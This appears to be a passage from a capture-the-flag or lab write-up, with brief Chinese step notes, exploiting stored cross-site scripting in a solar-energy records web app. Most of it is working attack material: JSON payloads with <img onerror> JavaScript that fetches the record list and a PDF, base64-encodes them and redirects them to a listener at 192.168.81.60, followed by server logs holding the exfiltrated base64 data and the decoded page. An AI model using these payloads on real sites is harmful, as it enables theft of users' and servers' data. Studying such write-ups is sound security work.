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ERm9udFR5cGUyCi9CYXNlRm9udCAvRGVqYVZ1U2FucwovQ0lEU3lzdGVtSW5mbyA8PCAvUmVnaXN0cnkgKEFkb2JlKSAvT3JkZXJpbmcgKElkZW50aXR5KSAvU3VwcGxlbWVudCAwID4+Ci9Gb250RGVzY3JpcHRvciAxNyAwIFIKL0NJRFRvR0lETWFwIC9JZGVudGl0eQovVyBbMCBbNTk1IDMzNCA1ODcgNjA4IDQwOCA4MTEgNTE3IDYwNyAyNzYgMzE1IDYyOSA1ODcgNTg3IDYxMCA1NDUgNjMwIDI3NiA2MzAgNjI5IDU5OCA3NjQgNjMxIDc0NiA2NzkgNjUxIDk4MSA2MzEgMjc2IDYzMCA2NzkgNTc0IDY4MCA2MzAgNjMwIDU1MyA2MzEgNjMxIDUyMSA2MDYgNjkzIDk2NiAyOTMgNjgwIDc0MiA3ODEgMjkzIDU3MSA2ODkgNzI2IDc4MSA2MzEgMzg5IDY4MSA2MzEgMzQ5IDYzMSA2MzEgNjI5IDYwNiA2MjcgNzY5IDYzMSA4NTYgNjMxIDgzMSA2MzAgXQpdCj4+CmVuZG9iagoyMCAwIG9iago8PCAvTGVuZ3RoIDgxOSA+PgpzdHJlYW0KL0NJREluaXQgL1Byb2NTZXQgZmluZHJlc291cmNlIGJlZ2luCjEyIGRpY3QgYmVnaW4KYmVnaW5jbWFwCi9DSURTeXN0ZW1JbmZvIDw8IC9SZWdpc3RyeSAoQWRvYmUpIC9PcmRlcmluZyAoVUNTKSAvU3VwcGxlbWVudCAwID4+IGRlZgovQ01hcE5hbWUgL0Fkb2JlLUlkZW50aXR5LVVDUyBkZWYKL0NNYXBUeXBlIDIgZGVmCjEgYmVnaW5jb2Rlc3BhY2VyYW5nZQo8MDAwMD4gPEZGRkY+CmVuZGNvZGVzcGFjZXJhbmdlCjIgYmVnaW5iZnJhbmdlCjwwMDAwPiA8MDAwMD4gPDAwMDA+CjwwMDAxPiA8MDA0MT4gWzwwMDJGPiA8MDA3Nj4gPDAwNjE+IDwwMDcyPiA8MDA3Nz4gPDAwNzM+IDwwMDZGPiA8MDA2Qz4gPDAwMkU+IDwwMDZFPiA8MDA3OT4gPDAwNzg+IDwwMDY1PiA8MDA2Mz4gPDAwNjQ+IDwwMDY5PiA8MDA3MD4gPDAwNjg+IDwwMDUwPiA8MDA0ND4gPDAwMzk+IDwwMDQ4PiA8MDA0MT4gPDAwNEI+IDwwMDU3PiA8MDAzNT4gPDAwNkE+IDwwMDYyPiA8MDA1Nj4gPDAwNkI+IDwwMDVBPiA8MDA1Mz4gPDAwNjc+IDwwMDRDPiA8MDAzND4gPDAwMzI+IDwwMDdBPiA8MDA1ND4gPDAwNDM+IDwwMDZEPiA8MDA0OT4gPDAwNTg+IDwwMDRFPiA8MDA1MT4gPDAwNEE+IDwwMDQ2PiA8MDA1Mj4gPDAwNTU+IDwwMDRGPiA8MDAzMT4gPDAwNzQ+IDwwMDQyPiA8MDAzOD4gPDAwNjY+IDwwMDMwPiA8MDAzMz4gPDAwNzU+IDwwMDU5PiA8MDA0NT4gPDAwNDc+IDwwMDM2PiA8MDA0RD4gPDAwMzc+IDwwMDJCPiA8MDA3MT4gXQplbmRiZnJhbmdlCmVuZGNtYXAKQ01hcE5hbWUgY3VycmVudGRpY3QgL0NNYXAgZGVmaW5lcmVzb3VyY2UgcG9wCmVuZAplbmQKCmVuZHN0cmVhbQplbmRvYmoKNiAwIG9iago8PCAvVHlwZSAvRm9udAovU3VidHlwZSAvVHlwZTAKL0Jhc2VGb250IC9EZWphVnVTYW5zCi9FbmNvZGluZyAvSWRlbnRpdHktSAovRGVzY2VuZGFudEZvbnRzIFsxOSAwIFJdCi9Ub1VuaWNvZGUgMjAgMCBSPj4KZW5kb2JqCjIgMCBvYmoKPDwKL1R5cGUgL1BhZ2VzCi9LaWRzIApbCjUgMCBSCjExIDAgUgpdCi9Db3VudCAyCi9Qcm9jU2V0IFsvUERGIC9UZXh0IC9JbWFnZUIgL0ltYWdlQ10KPj4KZW5kb2JqCnhyZWYKMCAyMgowMDAwMDAwMDAwIDY1NTM1IGYgCjAwMDAwMDAwMDkgMDAwMDAgbiAKMDAwMDAyMDEzNyAwMDAwMCBuIAowMDAwMDAwMjAxIDAwMDAwIG4gCjAwMDAwMDAyOTYgMDAwMDAgbiAKMDAwMDAwMDMzMyAwMDAwMCBuIAowMDAwMDIwMDAxIDAwMDAwIG4gCjAwMDAwMDA2MzcgMDAwMDAgbiAKMDAwMDAwNzU0MCAwMDAwMCBuIAowMDAwMDAwNDUyIDAwMDAwIG4gCjAwMDAwMDA2MTcgMDAwMDAgbiAKMDAwMDAwNzYxMCAwMDAwMCBuIAowMDAwMDA3NTYwIDAwMDAwIG4gCjAwMDAwMDc5MTggMDAwMDAgbiAKMDAwMDAwOTQ4MiAwMDAwMCBuIAowMDAwMDA3NzMyIDAwMDAwIG4gCjAwMDAwMDc4OTggMDAwMDAgbiAKMDAwMDAwOTUwMyAwMDAwMCBuIAowMDAwMDA5NzYzIDAwMDAwIG4gCjAwMDAwMTg2NTYgMDAwMDAgbiAKMDAwMDAxOTEzMCAwMDAwMCBuIAowMDAwMDE4NjM1IDAwMDAwIG4gCnRyYWlsZXIKPDwKL1NpemUgMjIKL0luZm8gMSAwIFIKL1Jvb3QgMTIgMCBSCj4+CnN0YXJ0eHJlZgoyMDI0MgolJUVPRgo= HTTP/1.1" 200 -

2.检索最新上传文件往data发送，查看文件名字

{
  "solarEnergy": "<img src=x onerror=\"(async () => { location.href='http://192.168.81.60:8000/?data='+btoa(String.fromCharCode(...new Uint8Array(await (await fetch('/records/')).arrayBuffer())));})(); \" />",
  "consumedEnergy": 15
}

192.168.81.83 - - [21/Mar/2025 14:49:35] "GET /?data=PCFET0NUWVBFIGh0bWw+CjxodG1sPgoKPGhlYWQ+CiAgICA8dGl0bGU+TGlzdCBvZiBTb2xhciBFbmVyZ3kgRGF0YTwvdGl0bGU+CiAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9Ii9zdHlsZS5jc3MiPgogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSIvc3R5bGUzLmNzcyI+CjwvaGVhZD4KCjxib2R5PgogICAgPGRpdiBzdHlsZT0ibWluLXdpZHRoOjQwMHB4O2JhY2tncm91bmQ6d2hpdGU7cGFkZGluZzoxNXB4O2JvcmRlci1yYWRpdXM6IDhweDtib3gtc2hhZG93OiAwIDAgMTBweCByZ2JhKDAsIDAsIDAsIDAuMSk7Ij4KICAgICAgICA8ZGl2IHN0eWxlPSJ0ZXh0LWFsaWduOmNlbnRlcjsiPjxvYmplY3QgY2xhc3M9InNvbGFyLWljb24iIGRhdGE9Ii4uL3N1bi5zdmciIHR5cGU9ImltYWdlL3N2Zyt4bWwiIHN0eWxlPSJ3aWR0aDo3NXB4OyI+PC9vYmplY3Q+PC9kaXY+CiAgICAgICAgPGgxPkxpc3Qgb2YgU29sYXIgRW5lcmd5IERhdGE8L2gxPgogICAgICAgIDx0YWJsZT4KICAgICAgICAgICAgPHRyPgogICAgICAgICAgICAgICAgPHRoPlJlY29yZDwvdGg+CiAgICAgICAgICAgICAgICA8dGg+QWN0aW9uczwvdGg+CiAgICAgICAgICAgIDwvdHI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dHI+CiAgICAgICAgICAgICAgICAgICAgPHRkPjIwMjQtMDktMDJUMjM6MTg6MTUuNzQyWjwvdGQ+CiAgICAgICAgICAgICAgICAgICAgPHRkPgogICAgICAgICAgICAgICAgICAgICAgICA8YSBocmVmPSI/ZG93bmxvYWQ9dHJ1ZSZmaWxlPTIwMjQtMDktMDJUMjMlM0ExOCUzQTE1Ljc0MlouanNvbiIgY2xhc3M9ImRvd25sb2FkLWJ0biI+RG93bmxvYWQgUERGPC9hPgogICAgICAgICAgICAgICAgICAgIDwvdGQ+CiAgICAgICAgICAgICAgICA8L3RyPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgPHRyPgogICAgICAgICAgICAgICAgICAgIDx0ZD4yMDI0LTA5LTAyVDIzOjE4OjQ0LjA5MVo8L3RkPgogICAgICAgICAgICAgICAgICAgIDx0ZD4KICAgICAgICAgICAgICAgICAgICAgICAgPGEgaHJlZj0iP2Rvd25sb2FkPXRydWUmZmlsZT0yMDI0LTA5LTAyVDIzJTNBMTglM0E0NC4wOTFaLmpzb24iIGNsYXNzPSJkb3dubG9hZC1idG4iPkRvd25sb2FkIFBERjwvYT4KICAgICAgICAgICAgICAgICAgICA8L3RkPgogICAgICAgICAgICAgICAgPC90cj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx0cj4KICAgICAgICAgICAgICAgICAgICA8dGQ+MjAyNC0wOS0wMlQyMzoyNDozMy44MjhaPC90ZD4KICAgICAgICAgICAgICAgICAgICA8dGQ+CiAgICAgICAgICAgICAgICAgICAgICAgIDxhIGhyZWY9Ij9kb3dubG9hZD10cnVlJmZpbGU9MjAyNC0wOS0wMlQyMyUzQTI0JTNBMzMuODI4Wi5qc29uIiBjbGFzcz0iZG93bmxvYWQtYnRuIj5Eb3dubG9hZCBQREY8L2E+CiAgICAgICAgICAgICAgICAgICAgPC90ZD4KICAgICAgICAgICAgICAgIDwvdHI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dHI+CiAgICAgICAgICAgICAgICAgICAgPHRkPjIwMjQtMDktMDJUMjM6MjQ6NDQuODAwWjwvdGQ+CiAgICAgICAgICAgICAgICAgICAgPHRkPgogICAgICAgICAgICAgICAgICAgICAgICA8YSBocmVmPSI/ZG93bmxvYWQ9dHJ1ZSZmaWxlPTIwMjQtMDktMDJUMjMlM0EyNCUzQTQ0LjgwMFouanNvbiIgY2xhc3M9ImRvd25sb2FkLWJ0biI+RG93bmxvYWQgUERGPC9hPgogICAgICAgICAgICAgICAgICAgIDwvdGQ+CiAgICAgICAgICAgICAgICA8L3RyPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgPHRyPgogICAgICAgICAgICAgICAgICAgIDx0ZD4yMDI0LTA5LTAyVDIzOjI1OjE1Ljk2MVo8L3RkPgogICAgICAgICAgICAgICAgICAgIDx0ZD4KICAgICAgICAgICAgICAgICAgICAgICAgPGEgaHJlZj0iP2Rvd25sb2FkPXRydWUmZmlsZT0yMDI0LTA5LTAyVDIzJTNBMjUlM0ExNS45NjFaLmpzb24iIGNsYXNzPSJkb3dubG9hZC1idG4iPkRvd25sb2FkIFBERjwvYT4KICAgICAgICAgICAgICAgICAgICA8L3RkPgogICAgICAgICAgICAgICAgPC90cj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx0cj4KICAgICAgICAgICAgICAgICAgICA8dGQ+MjAyNC0wOS0wMlQyMzoyOToxNC4xMjRaPC90ZD4KICAgICAgICAgICAgICAgICAgICA8dGQ+CiAgICAgICAgICAgICAgICAgICAgICAgIDxhIGhyZWY9Ij9kb3dubG9hZD10cnVlJmZpbGU9MjAyNC0wOS0wMlQyMyUzQTI5JTNBMTQuMTI0Wi5qc29uIiBjbGFzcz0iZG93bmxvYWQtYnRuIj5Eb3dubG9hZCBQREY8L2E+CiAgICAgICAgICAgICAgICAgICAgPC90ZD4KICAgICAgICAgICAgICAgIDwvdHI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dHI+CiAgICAgICAgICAgICAgICAgICAgPHRkPjIwMjUtMDMtMjBUMjI6MTI6NDIuMzkwWjwvdGQ+CiAgICAgICAgICAgICAgICAgICAgPHRkPgogICAgICAgICAgICAgICAgICAgICAgICA8YSBocmVmPSI/ZG93bmxvYWQ9dHJ1ZSZmaWxlPTIwMjUtMDMtMjBUMjIlM0ExMiUzQTQyLjM5MFouanNvbiIgY2xhc3M9ImRvd25sb2FkLWJ0biI+RG93bmxvYWQgUERGPC9hPgogICAgICAgICAgICAgICAgICAgIDwvdGQ+CiAgICAgICAgICAgICAgICA8L3RyPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgPHRyPgogICAgICAgICAgICAgICAgICAgIDx0ZD4yMDI1LTAzLTIxVDE1OjAwOjA3LjU5Mlo8L3RkPgogICAgICAgICAgICAgICAgICAgIDx0ZD4KICAgICAgICAgICAgICAgICAgICAgICAgPGEgaHJlZj0iP2Rvd25sb2FkPXRydWUmZmlsZT0yMDI1LTAzLTIxVDE1JTNBMDAlM0EwNy41OTJaLmpzb24iIGNsYXNzPSJkb3dubG9hZC1idG4iPkRvd25sb2FkIFBERjwvYT4KICAgICAgICAgICAgICAgICAgICA8L3RkPgogICAgICAgICAgICAgICAgPC90cj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx0cj4KICAgICAgICAgICAgICAgICAgICA8dGQ+MjAyNS0wMy0yMVQxNToxMzoxNS41ODRaPC90ZD4KICAgICAgICAgICAgICAgICAgICA8dGQ+CiAgICAgICAgICAgICAgICAgICAgICAgIDxhIGhyZWY9Ij9kb3dubG9hZD10cnVlJmZpbGU9MjAyNS0wMy0yMVQxNSUzQTEzJTNBMTUuNTg0Wi5qc29uIiBjbGFzcz0iZG93bmxvYWQtYnRuIj5Eb3dubG9hZCBQREY8L2E+CiAgICAgICAgICAgICAgICAgICAgPC90ZD4KICAgICAgICAgICAgICAgIDwvdHI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dHI+CiAgICAgICAgICAgICAgICAgICAgPHRkPjIwMjUtMDMtMjFUMTg6NDg6MjUuNzY1WjwvdGQ+CiAgICAgICAgICAgICAgICAgICAgPHRkPgogICAgICAgICAgICAgICAgICAgICAgICA8YSBocmVmPSI/ZG93bmxvYWQ9dHJ1ZSZmaWxlPTIwMjUtMDMtMjFUMTglM0E0OCUzQTI1Ljc2NVouanNvbiIgY2xhc3M9ImRvd25sb2FkLWJ0biI+RG93bmxvYWQgUERGPC9hPgogICAgICAgICAgICAgICAgICAgIDwvdGQ+CiAgICAgICAgICAgICAgICA8L3RyPgogICAgICAgICAgICAgICAgICAgIDwvdGFibGU+CiAgICAgICAgPGEgaHJlZj0iLi4vZGFzaGJvYXJkLnBocCIgY2xhc3M9ImxvZ291dC1saW5rIj4mbHQ7IEJhY2s8L2E+CiAgICA8L2Rpdj4KPC9ib2R5PgoKPC9odG1sPg== HTTP/1.1" 200 -

<!DOCTYPE html>
<html>

<head>
    <title>List of Solar Energy Data</title>
    <link rel="stylesheet" href="/style.css">
    <link rel="stylesheet" href="/style3.css">
</head>

<body>
    <div style="min-width:400px;background:white;padding:15px;border-radius: 8px;box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);">
        <div style="text-align:center;"><object class="solar-icon" data="../sun.svg" type="image/svg+xml" style="width:75px;"></object></div>
        <h1>List of Solar Energy Data</h1>
        <table>
            <tr>
                <th>Record</th>
                <th>Actions</th>
            </tr>
                            <tr>
                    <td>2024-09-02T23:18:15.742Z</td>
                    <td>
                        <a href="?download=true&file=2024-09-02T23%3A18%3A15.742Z.json" class="download-btn">Download PDF</a>
                    </td>
                </tr>
                            <tr>
                    <td>2024-09-02T23:18:44.091Z</td>
                    <td>
                        <a href="?download=true&file=2024-09-02T23%3A18%3A44.091Z.json" class="download-btn">Download PDF</a>
                    </td>
                </tr>
                            <tr>
                    <td>2024-09-02T23:24:33.828Z</td>
                    <td>
                        <a href="?download=true&file=2024-09-02T23%3A24%3A33.828Z.json" class="download-btn">Download PDF</a>
                    </td>
                </tr>
                            <tr>
                    <td>2024-09-02T23:24:44.800Z</td>
                    <td>
                        <a href="?download=true&file=2024-09-02T23%3A24%3A44.800Z.json" class="download-btn">Download PDF</a>
                    </td>
                </tr>
                            <tr>
                    <td>2024-09-02T23:25:15.961Z</td>
                    <td>
                        <a href="?download=true&file=2024-09-02T23%3A25%3A15.961Z.json" class="download-btn">Download PDF</a>
                    </td>
                </tr>
                            <tr>
                    <td>2024-09-02T23:29:14.124Z</td>
                    <td>
                        <a href="?download=true&file=2024-09-02T23%3A29%3A14.124Z.json" class="download-btn">Download PDF</a>
                    </td>
                </tr>
                            <tr>
                    <td>2025-03-20T22:12:42.390Z</td>
                    <td>
                        <a href="?download=true&file=2025-03-20T22%3A12%3A42.390Z.json" class="download-btn">Download PDF</a>
                    </td>
                </tr>
                            <tr>
                    <td>2025-03-21T15:00:07.592Z</td>
                    <td>
                        <a href="?download=true&file=2025-03-21T15%3A00%3A07.592Z.json" class="download-btn">Download PDF</a>
                    </td>
                </tr>
                            <tr>
                    <td>2025-03-21T15:13:15.584Z</td>
                    <td>
                        <a href="?download=true&file=2025-03-21T15%3A13%3A15.584Z.json" class="download-btn">Download PDF</a>
                    </td>
                </tr>
                            <tr>
                    <td>2025-03-21T18:48:25.765Z</td>
                    <td>
                        <a href="?download=true&file=2025-03-21T18%3A48%3A25.765Z.json" class="download-btn">Download PDF</a>
                    </td>
                </tr>
                    </table>
        <a href="../dashboard.php" class="logout-link">&lt; Back</a>
    </div>
</body>

</html>

3.下载pdf

{
  "solarEnergy": "<img src=x onerror=\"(async () => {location.href='http://192.168.81.60:8000?data='+btoa(String.fromCharCode(...new Uint8Array(await (await fetch('/records/?download=true&file=2025-03-21T18%3A48%3A25.765Z.json')).arrayBuffer())));})();\" />",
  "consumedEnergy": 15
}

192.168.81.83 - - [21/Mar/2025 14:52:25] "GET /?data=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